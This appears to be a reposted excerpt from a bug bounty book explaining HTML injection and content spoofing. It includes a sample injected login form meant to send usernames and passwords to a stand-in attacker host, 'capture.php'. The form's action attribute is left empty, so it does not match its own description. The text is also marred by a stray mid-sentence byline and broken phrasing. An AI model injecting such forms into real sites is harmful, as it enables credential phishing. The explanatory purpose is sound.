Hypertext Markup Language (HTML) injection and content spoofing are attacks that allow a malicious user to inject content into a site’s web pages. The attacker can inject HTML elements of their own design, most commonly as a <form> tag that mimics a legitimate login screen in order to trick targets into submitting sensitive information to a malicious site.

 Because these types of attacks rely on fooling targets (a practice sometimes called social engineering), By Hackfreaks official. bug bounty programs view content spoofing and HTML injection as less severe than other vulnerabilities covered in this book. An HTML injection vulnerability occurs when a website

allows an attacker to submit HTML tags, typically via some form input or URL parameters, which are then rendered directly on the web page. This is similar to cross-site scripting attacks, except those injections allow for the execution of malicious JavaScript,. HTML injection is sometimes referred to as virtual defacement. That’s because developers use the HTML

language to define the structure of a web page. So if an attacker can inject HTML and the site renders it, the attacker can change what a page looks like. This technique of tricking users into submitting sensitive information through a fake form is referred to as phishing. For example, if a page renders content that you can control,

you might be able to add a <form> tag to the page asking the user to reenter their username and password, like this:

➊ <form method='POST' action='' id='login-form'> <input type='text' name='username' value=''> <input type='password' name='password' value=''> <input type='submit' value='submit'>

</form> When a user submits this form, the information is sent to an

attacker’s website http://<attacker>.com/capture.php via an action attribute ➊. 

Content spoofing 

very similar to HTML injection except

attackers can only inject plaintext, not HTML tags. This limitation is typically caused by sites either escaping any included HTML or HTML tags being stripped when the server sends the HTTP response. Although attackers can’t format the web page with content spoofing, they might be able to insert text, such as a message, that looks as though it’s legitimate site content. Such messages can fool targets into performing an action but rely heavily on social engineering. 

Copy with credits leechers.

Post a Comment